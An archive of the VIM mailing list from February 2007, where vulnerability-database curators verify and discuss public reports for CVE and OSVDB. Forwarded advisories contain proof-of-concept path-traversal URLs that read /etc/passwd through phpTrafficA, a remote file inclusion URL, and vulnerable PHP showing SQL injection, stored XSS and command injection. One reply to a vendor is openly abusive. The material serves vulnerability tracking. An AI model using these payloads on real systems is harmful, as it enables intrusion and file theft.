http://www.bugtraq.ir Vulnerable Systems: Version: phpTrafficA-1.4.1 phpTrafficA-1.4beta4 (also tested on phpTrafficA-1.3) Description: Input passed to the "file" parameter in "plotStat.php" and "lang" parameter in "banref.php" is not properly verified, before it is used to include files. This can be exploited to include/see arbitrary files from local resources. read more about file inclusion in http://www.bugtraq.ir/articles Vulnerable Code : //phpTrafficA/plotStat.php //Vulnerable Code :line 14 if (!isset($file) or $file=="") {$file = $_GET['file'];} include("./Php/phplot.php"); include("./tmp/".$file); //phpTrafficA/plotStat.php //Vulnerable Code :line 16 if (!isset($lang) or $lang == "") { $lang = $_GET["lang"]; if ($lang == "") { $lang = $_POST["lang"];} } include ("./Lang/$lang.php"); POC exploit : The following URL will cause local file inclusion http://[HOST]/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/p asswd http://[HOST]/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/pa sswd%00 # http://www.bugtraq.ir ------------------------------------------------------- -- ? Noam Rathaus ? CTO ? 1616 Anderson Rd. ? McLean, VA 22102 ? Tel: 703.286.7725 extension 105 ? Fax: 888.667.7740 ? noamr at beyondsecurity.com ? http://www.beyondsecurity.com From noamr at beyondsecurity.com Thu Feb 22 05:55:58 2007 From: noamr at beyondsecurity.com (Noam Rathaus) Date: Thu, 22 Feb 2007 12:55:58 +0200 Subject: [VIM] [TRUE] Call Center Software - Remote Xss Post Exploit - Message-ID: <200702221255.58572.noamr@beyondsecurity.com> Hi, Looks real (code): $problem_desc = $_POST['problem_desc']; if(strlen($name) > 0 && strlen($problem_desc) > 0){ $sql = "insert into calls (call_date, name, phone, department_id, issue_id, problem_desc) values "; $sql .= "('$today', '$name', '$phone', '$department_id', '$issue_id', '$problem_desc')"; mysql_query($sql); Meaning that problem_desc is inserted without any kind of filtering, and read without any kind of filtering. ---------- Forwarded Message ---------- Subject: Call Center Software - Remote Xss Post Exploit - Date: Wednesday 21 February 2007 21:23 From: corrado.liotta at alice.it To: bugtraq at securityfocus.com -=[--------------------ADVISORY-------------------]=- Call center 0,93 Author: CorryL [corryl80 at gmail.com] -=[-----------------------------------------------]=- -=[+] Application: Call senter -=[+] Version: 0,93 -=[+] Vendor's URL: http://www.call-center-software.org/ -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: Cross-Site Script -=[+] Exploitation: Remote -=[-] -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Reference: www.xoned.net -=[+] Virtual Office: http://www.kasamba.com/CorryL -=[+] Irc Chan: irc.darksin.net #x0n3-h4ck ..::[ Descriprion ]::.. Call center software is one of the most important aspects of any call help center, being able to track and manage calls can be the key to high customer safisfacation. Our 100% free call center software solution is based on php and the mysql database. ..::[ Bug ]::.. An attacker exploiting this vulnerability is able steal the content the cookies of the consumer admin in fact the bug situated is on an request post then he remains memorized inside the database in attends him that the admin goes to read the content of the call ..::[Exploit]::.. Call Center
Adding Call
Name: 
Phone: 
Department: 
Issue Type: 
Xss Script Here : 
 
------------------------------------------------------- -- ? Noam Rathaus ? CTO ? 1616 Anderson Rd. ? McLean, VA 22102 ? Tel: 703.286.7725 extension 105 ? Fax: 888.667.7740 ? noamr at beyondsecurity.com ? http://www.beyondsecurity.com From noamr at beyondsecurity.com Thu Feb 22 06:22:03 2007 From: noamr at beyondsecurity.com (Noam Rathaus) Date: Thu, 22 Feb 2007 13:22:03 +0200 Subject: [VIM] [TRUE] Nabopoll Blind SQL Injection vulnerabilies Message-ID: <200702221322.03608.noamr@beyondsecurity.com> Hi, Looks like its true, survey value arrives from $surv which doesn't get filtered for anything when it comes in from the web interface. Appears to be true, can someone else confirm? ---------- Forwarded Message ---------- Subject: Nabopoll Blind SQL Injection vulnerabilies Date: Wednesday 21 February 2007 17:40 From: s0cratex at hotmail.com To: bugtraq at securityfocus.com Nabopoll have a bug in some files, for example results.php Line 27...31 -------------------------------- $res_question = mysql_query("select * from nabopoll_questions where survey=$survey order by id"); if ($res_question == FALSE || mysql_numrows($res_question) == 0) error($row_survey, "questions not found"); -------------------------------- Exploit -------------------------------- ------------------------------------------------------- -- ? Noam Rathaus ? CTO ? 1616 Anderson Rd. ? McLean, VA 22102 ? Tel: 703.286.7725 extension 105 ? Fax: 888.667.7740 ? noamr at beyondsecurity.com ? http://www.beyondsecurity.com From noamr at beyondsecurity.com Thu Feb 22 06:23:19 2007 From: noamr at beyondsecurity.com (Noam Rathaus) Date: Thu, 22 Feb 2007 13:23:19 +0200 Subject: [VIM] [TRUE] Nabopoll Blind SQL Injection vulnerabilies (Confirmed) Message-ID: <200702221323.19897.noamr@beyondsecurity.com> Hi, I see that str0ke already confirmed it. ---------- Forwarded Message ---------- Subject: Nabopoll Blind SQL Injection vulnerabilies Date: Wednesday 21 February 2007 17:40 From: s0cratex at hotmail.com To: bugtraq at securityfocus.com Nabopoll have a bug in some files, for example results.php Line 27...31 -------------------------------- $res_question = mysql_query("select * from nabopoll_questions where survey=$survey order by id"); if ($res_question == FALSE || mysql_numrows($res_question) == 0) error($row_survey, "questions not found"); -------------------------------- Exploit -------------------------------- ------------------------------------------------------- -- ? Noam Rathaus ? CTO ? 1616 Anderson Rd. ? McLean, VA 22102 ? Tel: 703.286.7725 extension 105 ? Fax: 888.667.7740 ? noamr at beyondsecurity.com ? http://www.beyondsecurity.com From coley at mitre.org Thu Feb 22 14:22:19 2007 From: coley at mitre.org (Steven M. Christey) Date: Thu, 22 Feb 2007 14:22:19 -0500 (EST) Subject: [VIM] "Phil's Bookmark" looks, smells site-specific Message-ID: <200702221922.l1MJMJ9P009648@faron.mitre.org> I're cleaning out leftover 2006 references for CVE, which is why I'm posting about so many old issues. Refs: Phil's Bookmark script admin By-pass http://www.securityfocus.com/archive/1/archive/1/433222/30/5130/threaded I followed up asking "is this site-specific"? http://www.securityfocus.com/archive/1/archive/1/433441/30/5100/threaded The response here: http://www.securityfocus.com/archive/1/archive/1/433869/30/5040/threaded was "Yes, there really is a issue here. If you take time and don't just look at the first 2-3 pages in google. Phil's Bookmark is a bookmark script." Naturally, there was no actual URL provided. So Googling about I was only able to find this: Phil's Bookmark Thingy www.baskette.com/bookmarks/index.php?showall=1 Looking around, you can see various successful hacks. So the issue is real, anyway. In an ironic twist, someone (perhaps not Phil) added links to various internet security sites. The page appears to be run by a guy named Phil. There is no contact information, otherwise I'd send an inquiry. Google doesn't return any more results for "Phil's Bookmark script" besides the Bugtraq post and related messages. I looked through everything. So, I'm thinking site-specific here. - Steve From coley at mitre.org Thu Feb 22 19:29:29 2007 From: coley at mitre.org (Steven M. Christey) Date: Thu, 22 Feb 2007 19:29:29 -0500 (EST) Subject: [VIM] Nomadic IBM APAR's Message-ID: <200702230029.l1N0TTnC015419@faron.mitre.org> All, The following URL: http://www-1.ibm.com/support/docview.wss?uid=swg1IY94817 Used to be for APAR IY94817, but now it's 404. Apparently it moved here: http://www-1.ibm.com/support/docview.wss?uid=swg21255747 Although under "Related information" they refer to their own broken link. Lately, I've been running across these nomadic URLs in IBM's web site more frequently. Once upon a time, you could plugin in an [APAR] number into the following and get something: http://www-1.ibm.com/support/search.wss?rs=0&q=[APAR]&apar=only but this isn't always working, and neither does the "Search" button at the top always work. How do other people deal with this? Oh, by the way - there's a slight inconsistency between what IY94817 *used to say* and what iDEFENSE is saying in their "IBM DB2 Universal Database DB2INSTANCE File Creation Vulnerability" advisory, i.e. IY94817 mentions symlinks but iDEFENSE does not. The old IY94817 said: "SECURITY: DB2DIAG.LOG SYMBOLIC LINK OVERWRITE VULNERABILITY... A vulnerability exists in several set-uid DB2 binaries that can be exploited by a local user. The vulnerability allows a local user to write to any file on the system through the use of symbolic links (also known as symlinks or soft links). This problem does not affect Windows systems." The new version refers to a buffer overflow and a "symlink overwrite." - Steve From jericho at attrition.org Thu Feb 22 19:42:48 2007 From: jericho at attrition.org (security curmudgeon) Date: Thu, 22 Feb 2007 19:42:48 -0500 (EST) Subject: [VIM] Nomadic IBM APAR's In-Reply-To: <200702230029.l1N0TTnC015419@faron.mitre.org> References: <200702230029.l1N0TTnC015419@faron.mitre.org> Message-ID: : Lately, I've been running across these nomadic URLs in IBM's web site : more frequently. I know you and I have had this conversation at least once in the past. IBM's site is getting increasingly more user unfriendly. : How do other people deal with this? I always leave snide remarks in the feedback box for starters. Any document I load that doesn't refer to the corresponding CVE entry gets a snarky comment for sure. From theall at tenablesecurity.com Thu Feb 22 22:31:23 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Thu, 22 Feb 2007 22:31:23 -0500 Subject: [VIM] Verisign ConfigChk ActiveX Overflow(s) Message-ID: <45DE600B.7000305@tenablesecurity.com> Has anyone determined if there are any differences between the buffer overflow covered by US-CERT's VU#308087 and iDefense's advisory #479. Both involve the VerCompare() method of the Verisign's Configuration Checker ActiveX? SecurityFocus has two BIDs: 22671 and 22676 respectively. There's an acknowledgement from Verisign of what appears to be a single issue (ie, "VeriSign has discovered *a* buffer overrun security vulnerability", emphasis mine) here: http://www.verisign.com/support/advisories/page_040740.html George -- theall at tenablesecurity.com From coley at linus.mitre.org Fri Feb 23 13:45:53 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 23 Feb 2007 13:45:53 -0500 (EST) Subject: [VIM] Verisign ConfigChk ActiveX Overflow(s) In-Reply-To: <45DE600B.7000305@tenablesecurity.com> References: <45DE600B.7000305@tenablesecurity.com> Message-ID: > Has anyone determined if there are any differences between the buffer > overflow covered by US-CERT's VU#308087 and iDefense's advisory #479. > Both involve the VerCompare() method of the Verisign's Configuration > Checker ActiveX? SecurityFocus has two BIDs: 22671 and 22676 respectively. I decided to merge these in CVE. The correlating data was too close. And given that the iDEFENSE advisory mentioned there were 2 arguments for VerCompare(), there isn't much room for different issues. There only seems to be one patch coming from Verisign in this time frame. Now, iDefense might have mistakenly assumed this was a fix for their vuln - research orgs sometimes do that - but still, there are other correlators. > There's an acknowledgement from Verisign of what appears to be a single > issue (ie, "VeriSign has discovered *a* buffer overrun security > vulnerability", emphasis mine) here: > > http://www.verisign.com/support/advisories/page_040740.html In CVE, we'll frequently note - but otherwise dismiss - when vendors talk about "a" vuln because there are frequently multiple issues. Everybody counts vulns differently, vendors least of all. Though it is strange that they say *they* discovered it. - Steve From smoore at securityglobal.net Fri Feb 23 17:07:42 2007 From: smoore at securityglobal.net (Stuart Moore) Date: Fri, 23 Feb 2007 17:07:42 -0500 Subject: [VIM] Verisign ConfigChk ActiveX Overflow(s) In-Reply-To: References: <45DE600B.7000305@tenablesecurity.com> Message-ID: <45DF65AE.1090709@securityglobal.net> Steve, iDefense is owned by VeriSign, so, "they" did indeed discover a vulnerability in their own product. Stuart Steven M. Christey wrote: > >> Has anyone determined if there are any differences between the buffer >> overflow covered by US-CERT's VU#308087 and iDefense's advisory #479. >> Both involve the VerCompare() method of the Verisign's Configuration >> Checker ActiveX? SecurityFocus has two BIDs: 22671 and 22676 respectively. > > I decided to merge these in CVE. The correlating data was too close. > And given that the iDEFENSE advisory mentioned there were 2 arguments for > VerCompare(), there isn't much room for different issues. There only > seems to be one patch coming from Verisign in this time frame. Now, > iDefense might have mistakenly assumed this was a fix for their vuln - > research orgs sometimes do that - but still, there are other correlators. > >> There's an acknowledgement from Verisign of what appears to be a single >> issue (ie, "VeriSign has discovered *a* buffer overrun security >> vulnerability", emphasis mine) here: >> >> http://www.verisign.com/support/advisories/page_040740.html > > In CVE, we'll frequently note - but otherwise dismiss - when vendors talk > about "a" vuln because there are frequently multiple issues. Everybody > counts vulns differently, vendors least of all. Though it is strange that > they say *they* discovered it. > > - Steve > From jericho at attrition.org Fri Feb 23 22:05:29 2007 From: jericho at attrition.org (security curmudgeon) Date: Fri, 23 Feb 2007 22:05:29 -0500 (EST) Subject: [VIM] CVE-2007-0392 Dispute Message-ID: CVE-2007-0392 (and 0393, 0394) comes from: http://archives.neohapsis.com/archives/bugtraq/2007-01/0430.html Replies went to both Bugtraq and F-D, but not always to both. There are two specific replies suggesting AIX is not vulnerable: http://archives.neohapsis.com/archives/bugtraq/2007-01/0465.html http://archives.neohapsis.com/archives/bugtraq/2007-01/0480.html From jericho at attrition.org Sat Feb 24 08:09:03 2007 From: jericho at attrition.org (security curmudgeon) Date: Sat, 24 Feb 2007 08:09:03 -0500 (EST) Subject: [VIM] [OSVDB Mods] OSVDB: Comment Awaiting Moderation In-Reply-To: <20070224125047.8C1A181AE4@forced.attrition.org> References: <20070224125047.8C1A181AE4@forced.attrition.org> Message-ID: : A new comment is awaiting moderation. Please review: : Author: www.phppeanuts.org (82.73.107.143) : OSVDB-ID: 30397 : Comment: Your description states "Currently, there are no known : upgrades, patches, or workarounds available to correct this : issue."

In fact a patch as well as patched versions : have been available for download since 16-11-2006. Unpatched versions : have not been available for download from our website since that date. :

You forget to mentions that the vurnerability was in a : helper file of the unit testing tool, something that is normally not : placed on line and certainly not without password-controlled access. The : phppeanuts demonstration site was probably the only site that was : actually vurnerable to the public.

The unit testing tool : does not use the framework for its own execution. The framework itself : has not been hacked.

The information about the patch has : been on the homepage of our website since that date, which is several : days before your last update date. Why did you not ask us for : information about the vurnerability? Why did you not inform us about the : information you are publishing here?

Please correct your : information.
We forget to mention blah blah blah? We know NOTHING about your product other than what was originally posted to http://www.milw0rm.com/exploits/2778. The original point of disclosure says nothing about "unpatched versions", "helper files", "unit testing tools" or what was or was not placed online with or without password-controlled access. We didn't ask you for details of this because we didn't disclose the vulnerability. We didn't ask you for details because we attempt to monitor over *100 HUNDRED VULNERABILITIES PUBLISHED DAILY* and don't have the time or resources to contact each vendor, hold their hand, change their diaper and gently stroke them as they write shoddy code and introduce vulnerabilities in their products, be it in their own web sites, demo web sites or downloadable packages. We will correct our information when you get a fucking clue, treat us with the respect you think we owe you, and get over your pathetic egos when it comes to writing secure code. Until then, whine like a bitch to milw0rm.com for posting this before we did, then wine to IBM (x-force), CVE (cve.mitre.org), Symantec (BID), Secunia and FR-SiRT, all commercial companies or government sponsored projects, before you go whining to the non-profit volunteer run OSVDB.org. When you do that, or send us a *reasonable* mail that isn't accusing us of some wrong-doing, THEN we will consider updating our entry with information pertaining to this vulnerability. Until then, kindly lick my asshole clean. We clear? Brian OSVDB.org From jericho at attrition.org Sat Feb 24 08:16:20 2007 From: jericho at attrition.org (security curmudgeon) Date: Sat, 24 Feb 2007 08:16:20 -0500 (EST) Subject: [VIM] [OSVDB Mods] Re: Lame Gimmicks (fwd) Message-ID: re: Rixstep thread on Full-Disclosure: http://archives.neohapsis.com/archives/fulldisclosure/2007-01/thread.html#283 http://archives.neohapsis.com/archives/fulldisclosure/2007-01/thread.html#304 http://archives.neohapsis.com/archives/fulldisclosure/2007-01/0414.html http://archives.neohapsis.com/archives/fulldisclosure/2007-01/thread.html#415 Shortly after the original post in all that mess, I posted a blog entry to the OSVDB blog questioning who Rixstep was and why they mattered in the grand scheme of "Month of X bugs" trend (in so many words): http://osvdb.org/blog/?p=160 In response to this blog entry, they decided not to post a reply on the blog, but to specifically contact Jake, and only Jake, with a reply. Jake belatedly replied to them with confusion, since he was swamped with his day job and had no knowledge of my blog entry. They quickly replied.. time passed.. I replied, and Rixstep replied not even two hours later, suggesting I had no life or nothing better to do. Fuckers, now I have to go dig up the entire mail thread with time stamps just to prove how lame these people are, and just how insignificant they really are. Adding this to the ever growing to-do list, after items I added three or more months ago on this list. ---------- Forwarded message ---------- From: security curmudgeon To: contact at rixstep.com Cc: OSVDB Mods Date: Sat, 24 Feb 2007 07:57:09 -0500 (EST) Reply-To: moderators at osvdb.org Subject: [OSVDB Mods] Re: Lame Gimmicks On Sat, 24 Feb 2007, contact at rixstep.com wrote: : Christ Jesus you wee tosser - you got nothing better to do? : : You really have personality issues, don't you? LOL I'm busy with my day job and providing security solutions to my clients for the past few months causing my mails and replies to be considerably late. I *finally* get around to catching up on my *hobby* project (OSVDB.org) and send a quick mail to you and Jake (who you whined to even though he had nothing to do with the original comments). In return, not even two HOURS later, after my two MONTH late response, I receive this reply? If I post this thread in full, who do you think will come across as not having anything better to do or having 'personality issues'? Before you respond, consider that I have spent 10 minutes a month for the last 10 years pointing out the charlatans in the security industry. What has Rixstep been doing for the past ten years? I'll gladly take on the title of 'tosser' if you will will agree to take on the title of 'charlatan'. Deal? Jericho From coley at mitre.org Sat Feb 24 16:51:40 2007 From: coley at mitre.org (Steven M. Christey) Date: Sat, 24 Feb 2007 16:51:40 -0500 (EST) Subject: [VIM] Vendor ACK for CVE-2006-3832 (loudblog SQL injection) Message-ID: <200702242151.l1OLpeTG009392@faron.mitre.org> CONFIRM:http://loudblog.de/forum/viewtopic.php?id=762 CONFIRM:http://loudblog.de/forum/viewtopic.php?id=770 - Steve From jericho at attrition.org Mon Feb 26 01:12:21 2007 From: jericho at attrition.org (security curmudgeon) Date: Mon, 26 Feb 2007 01:12:21 -0500 (EST) Subject: [VIM] OT: Humor - Vulnerability News Spoof Message-ID: Apologies to everyone for my attempted humorous spoof =) -- MITRE Announces No New Vulnerabilities in 2006 FOR IMMEDIATE RELEASE MITRE Contacts: Steven "False Again" Christey Bill "That's False Too!" Heinbockel Bedford, Massachusetts, January 15, 2007 -- The MITRE Corporation announced today after extensive analysis that no new vulnerabilities were published in 2006. Throughout the year of 2006, the ongoing debate between full disclosure and responsible disclosure became completely moot. With 6,387 unique vulnerability reports made, almost every single one has since been proven a false reporting. "We at CVE have gone over the data and source code for 6,387 vulnerability disclosures and have concluded that 6,386 were incorrect and that no vulnerability was present. For the 1 report not labeled false, the path disclosure issue affected CertBlog 0.3beta if every PHP option was enabled and the administrator copied installation files back after they were deleted by the program." says CVE lead Steven Christey. Given the severity of the information, MITRE's CVE collaborated with other industry leaders SecurityTracker, milw0rm, Securiteam and OSVDB to validate these findings. "Unbelievable" was all str0ke could say about the previous year's disclosures. "Like any of us are really surprised?" replied Martin, suggesting that this was bound to happen. As of the time of this press release, there have been no valid vulnerabilities disclosed in 2007 either. From jericho at attrition.org Mon Feb 26 07:20:30 2007 From: jericho at attrition.org (security curmudgeon) Date: Mon, 26 Feb 2007 07:20:30 -0500 (EST) Subject: [VIM] IBM ISS 2006 Threat Review Message-ID: Interesting/relevant info from the IBM/ISS 2006 Trend Statistics. Discuss, debate or ponder as you please. http://www.iss.net/documents/whitepapers/X_Force_Exec_Brief.pdf Vulnerabilities * There were a total of 7,247 vulnerabilities in 2006, which represents a 39.5 percent increase over 2005. * June was the busiest month of the year with 696 vulnerabilities. * Week 46 (the week before Thanksgiving) was the busiest week of 2006 for new vulnerabilities. * The most popular day for vulnerability disclosures was Tuesday. * Weekend disclosure of vulnerabilities in 2006 more than doubled that of 2005 to reach 17.6 percent of all disclosures. * High impact vulnerabilities continue to decrease as a percentage of total vulnerabilities in 2006. * 3 percent of vulnerabilities under the Common Vulnerability Scoring System (CVSS) were evaluated as being critical impact vulnerabilities with a score of 10. * The top three vulnerable vendors in 2006 were Microsoft, Oracle and Apple. * The top 10 vulnerable software vendors accounted for 14 percent of all 2006 vulnerabilities. * 17 percent of the vulnerabilities identified within the top 10 vulnerable vendors products were un-patched at the end of 2006. This contrasts with 65 percent un-patched for all other vulnerabilities recorded in the year. * 88.4 percent of all 2006 vulnerabilities could be exploited remotely. * Over half (50.6 percent) of 2006 vulnerabilities would allow an attacker to gain access to the host after successful exploitation. From str0ke at milw0rm.com Mon Feb 26 09:29:56 2007 From: str0ke at milw0rm.com (str0ke) Date: Mon, 26 Feb 2007 08:29:56 -0600 Subject: [VIM] OT: Humor - Vulnerability News Spoof In-Reply-To: References: Message-ID: <814b9d50702260629h7ebe47dbl4eb0e330fbca1b9c@mail.gmail.com> Unbelievable On 2/26/07, security curmudgeon wrote: > > Apologies to everyone for my attempted humorous spoof =) > > -- > > MITRE Announces No New Vulnerabilities in 2006 > > FOR IMMEDIATE RELEASE > > MITRE Contacts: > Steven "False Again" Christey > Bill "That's False Too!" Heinbockel > > > Bedford, Massachusetts, January 15, 2007 -- The MITRE Corporation > announced today after extensive analysis that no new vulnerabilities were > published in 2006. > > Throughout the year of 2006, the ongoing debate between full disclosure > and responsible disclosure became completely moot. With 6,387 unique > vulnerability reports made, almost every single one has since been proven > a false reporting. > > "We at CVE have gone over the data and source code for 6,387 vulnerability > disclosures and have concluded that 6,386 were incorrect and that no > vulnerability was present. For the 1 report not labeled false, the path > disclosure issue affected CertBlog 0.3beta if every PHP option was enabled > and the administrator copied installation files back after they were > deleted by the program." says CVE lead Steven Christey. > > Given the severity of the information, MITRE's CVE collaborated with other > industry leaders SecurityTracker, milw0rm, Securiteam and OSVDB to > validate these findings. "Unbelievable" was all str0ke could say about the > previous year's disclosures. "Like any of us are really surprised?" > replied Martin, suggesting that this was bound to happen. > > As of the time of this press release, there have been no valid > vulnerabilities disclosed in 2007 either. > From coley at linus.mitre.org Tue Feb 27 03:17:04 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Tue, 27 Feb 2007 03:17:04 -0500 (EST) Subject: [VIM] IBM ISS 2006 Threat Review In-Reply-To: References: Message-ID: Ooooh, an opportunity to procrastinate and pontificate! I'll byte. On Mon, 26 Feb 2007, security curmudgeon wrote: > Interesting/relevant info from the IBM/ISS 2006 Trend Statistics. Discuss, > debate or ponder as you please. > DISCLAIMER: PONDERING ONLY. I'm using rough stats only. > * There were a total of 7,247 vulnerabilities in 2006, which represents a > 39.5 percent increase over 2005. I just realized another bias: we get better every year at tracking vulns - there are more sources, and we get faster at cataloging obvious stuff. CVE has been pretty open about this change, but I bet it happens to all VDB's. Thus growth is (perhaps) slightly less than our stats would show, assuming we're not getting worse at tracking things. > * June was the busiest month of the year with 696 vulnerabilities. In CVE too, at 688 so far. Feb was slowest at 492, but normalizing by number of days in each month, July was slowest (505, making for 16.3 per day). > * The most popular day for vulnerability disclosures was Tuesday. Confirmed in CVE data, mentioned previously, by a few hundred - 21%, compared with 14% if there was an even distribution. Week before Thanksgiving was number 3 - but only 2 less than the week starting Oct 15, the lead - and these minor discrepancies are insignificant. Plus we're slightly less complete in Nov/Dec than earlier months. Top 10 weeks ranged from 159 to 182 CVE's. Week starting Jan 22 was slowest at 73. I remember a few years ago when that would be an insane month... > * Weekend disclosure of vulnerabilities in 2006 more than doubled that of > 2005 to reach 17.6 percent of all disclosures. 17 percent for CVE's too; around 10% in 2005. Interesting! > * High impact vulnerabilities continue to decrease as a percentage of > total vulnerabilities in 2006. Don't measure this. > * 3 percent of vulnerabilities under the Common Vulnerability Scoring > System (CVSS) were evaluated as being critical impact vulnerabilities with > a score of 10. Could look at NVD and figure this out but that's not part of my procrastination plan. > * The top 10 vulnerable software vendors accounted for 14 percent of all > 2006 vulnerabilities. Well, they're mostly OS++ vendors right? They have a bigger vulnerability surface than anyone, bigger than a bulletin board written in PHP with register_globals, allow_fopen_url, and magic_quotes_gpc at their weakest settings. > * 17 percent of the vulnerabilities identified within the top 10 > vulnerable vendors products were un-patched at the end of 2006. This > contrasts with 65 percent un-patched for all other vulnerabilities > recorded in the year. CVE has held steady for years at ~45-50% vendor acknowledgement, which usually correlates to patches but not always; and we have more stringent rules for ack than others. Estimate 40% for 2006. Can't really compare ISS' stat with ours though. > * 88.4 percent of all 2006 vulnerabilities could be exploited remotely. At least 80% for CVE, maybe more; this field isn't always filled out, and we have "unknown" and "other" categories. - Steve From mjc at redhat.com Tue Feb 27 04:02:40 2007 From: mjc at redhat.com (Mark J Cox) Date: Tue, 27 Feb 2007 09:02:40 +0000 (GMT) Subject: [VIM] IBM ISS 2006 Threat Review In-Reply-To: References: Message-ID: <0702270859260.20463@somethingunique.awe.com> > there are more sources, So time for a new project, the Common Reporter Enumeration (CRE)? Would be kind of nice to have a measurable mapping between CVE and reporter, and would allow third parties to publish things like CRE-to-reliability mapping ;) Mark From heinbockel at mitre.org Tue Feb 27 09:13:28 2007 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Tue, 27 Feb 2007 09:13:28 -0500 Subject: [VIM] Verified: arabhost function.php RFI Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC019EF714@IMCSRV5.MITRE.ORG> BUGTRAQ:20070222 Hasadya Raed http://www.securityfocus.com/archive/1/archive/1/460933/100/0/threaded > B.File : > function.php > > V.Code : > include($adminfloder"); > > Expl : http://www.victim.com/path/function.php?adminfolder=[Shell-Attack] Since the script download at http://delmaa.com/upfile/users/arabHost.zip is currently 404. I'll refer to the Google Code cache of arabHost/function.php: http://www.google.com/codesearch?hl=en&q=show:y_09L32ZX4g:c-H4PKvziZc:C SW92BIlIMw&sa=N&ct=rd&cs_p=http://delmaa.com/upfile/users/arabHost.zip& cs_f=arabHost/function.php Code (lines 1-4): > > include("includes/protaction.php"); > include("$adminfloder/config.php"); And the package contains no "includes/protaction.php" file (and the ReadMe.html is in Arabic), so this issue does appear valid. Sorry jericho, no disputes this time. Bill "That's False Too!" Heinbockel Infosec Engineer The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615 From str0ke at milw0rm.com Tue Feb 27 10:20:02 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 27 Feb 2007 09:20:02 -0600 Subject: [VIM] Verified: arabhost function.php RFI In-Reply-To: <224FBC6B814DBD4E9B9E293BE33A10DC019EF714@IMCSRV5.MITRE.ORG> References: <224FBC6B814DBD4E9B9E293BE33A10DC019EF714@IMCSRV5.MITRE.ORG> Message-ID: <814b9d50702270720s72091d1bo3b6b39b619bcff09@mail.gmail.com> Bill "That's False Too!" Heinbockel, I umm tested this awhile back and the file did exist includes/protaction.php. :( In the email back to the author I stated. includes/protaction.php contains $adminfloder :( Very strange. /str0ke On 2/27/07, Heinbockel, Bill wrote: > BUGTRAQ:20070222 Hasadya Raed > http://www.securityfocus.com/archive/1/archive/1/460933/100/0/threaded > > > B.File : > > function.php > > > > V.Code : > > include($adminfloder"); > > > > Expl : > http://www.victim.com/path/function.php?adminfolder=[Shell-Attack] > > > Since the script download at > http://delmaa.com/upfile/users/arabHost.zip > is currently 404. I'll refer to the Google Code cache of > arabHost/function.php: > > http://www.google.com/codesearch?hl=en&q=show:y_09L32ZX4g:c-H4PKvziZc:C > SW92BIlIMw&sa=N&ct=rd&cs_p=http://delmaa.com/upfile/users/arabHost.zip& > cs_f=arabHost/function.php > > Code (lines 1-4): > > > > > include("includes/protaction.php"); > > include("$adminfloder/config.php"); > > And the package contains no "includes/protaction.php" file (and > the ReadMe.html is in Arabic), so this issue does appear valid. > > > Sorry jericho, no disputes this time. > > Bill "That's False Too!" Heinbockel > Infosec Engineer > The MITRE Corporation > 202 Burlington Rd. MS S145 > Bedford, MA 01730 > heinbockel at mitre.org > 781-271-2615 > From heinbockel at mitre.org Tue Feb 27 11:29:17 2007 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Tue, 27 Feb 2007 11:29:17 -0500 Subject: [VIM] Verified: arabhost function.php RFI In-Reply-To: <814b9d50702270720s72091d1bo3b6b39b619bcff09@mail.gmail.com> References: <224FBC6B814DBD4E9B9E293BE33A10DC019EF714@IMCSRV5.MITRE.ORG> <814b9d50702270720s72091d1bo3b6b39b619bcff09@mail.gmail.com> Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC019EF76C@IMCSRV5.MITRE.ORG> Interesting... in the Google Code cache there is no protaction.php. In includes/, I see aHostTemplete.php files/Host.php files/domin.php files/rellese.php files/send.php files/server.php Since the original archive is no longer available, this could be a case of the file being missing from Google cache or this is a different version than the one you examined. William Heinbockel Infosec Engineer The MITRE Corporation 202 Burlington Rd. MS S145 Bedford, MA 01730 heinbockel at mitre.org 781-271-2615 >-----Original Message----- >From: vim-bounces at attrition.org >[mailto:vim-bounces at attrition.org] On Behalf Of str0ke >Sent: Tuesday, 27 February, 2007 10:20 >To: Vulnerability Information Managers >Subject: Re: [VIM] Verified: arabhost function.php RFI > >Bill "That's False Too!" Heinbockel, > >I umm tested this awhile back and the file did exist >includes/protaction.php. :( > >In the email back to the author I stated. > >includes/protaction.php contains $adminfloder :( > >Very strange. > >/str0ke > >On 2/27/07, Heinbockel, Bill wrote: >> BUGTRAQ:20070222 Hasadya Raed >> >http://www.securityfocus.com/archive/1/archive/1/460933/100/0/threaded >> >> > B.File : >> > function.php >> > >> > V.Code : >> > include($adminfloder"); >> > >> > Expl : >> http://www.victim.com/path/function.php?adminfolder=[Shell-Attack] >> >> >> Since the script download at >> http://delmaa.com/upfile/users/arabHost.zip >> is currently 404. I'll refer to the Google Code cache of >> arabHost/function.php: >> >> >http://www.google.com/codesearch?hl=en&q=show:y_09L32ZX4g:c-H4PKvziZc: C >> >SW92BIlIMw&sa=N&ct=rd&cs_p=http://delmaa.com/upfile/users/arabHost.zip & >> cs_f=arabHost/function.php >> >> Code (lines 1-4): >> > > > >> > include("includes/protaction.php"); >> > include("$adminfloder/config.php"); >> >> And the package contains no "includes/protaction.php" file (and >> the ReadMe.html is in Arabic), so this issue does appear valid. >> >> >> Sorry jericho, no disputes this time. >> >> Bill "That's False Too!" Heinbockel >> Infosec Engineer >> The MITRE Corporation >> 202 Burlington Rd. MS S145 >> Bedford, MA 01730 >> heinbockel at mitre.org >> 781-271-2615 >> > From coley at mitre.org Tue Feb 27 12:08:59 2007 From: coley at mitre.org (Steven M. Christey) Date: Tue, 27 Feb 2007 12:08:59 -0500 (EST) Subject: [VIM] WebMplayer "eval injection" is actually OS command injection Message-ID: <200702271708.l1RH8x7D027399@faron.mitre.org> Ref: CONFIRM:http://sourceforge.net/project/shownotes.php?release_id=486880&group_id=172354 The statement "index.php: Bugfix: $val must be numeric, so no other can be commands inserted" has apparently been interpreted as eval injection by some sources (and a "param" parameter), but a code review for index.php in 0.6alpha shows: while(list($param) = each($_GET)){ if(isset($_GET[$param])){$val = $_GET[$param];} if (!empty($val)){ exec($aumix." -".$param." 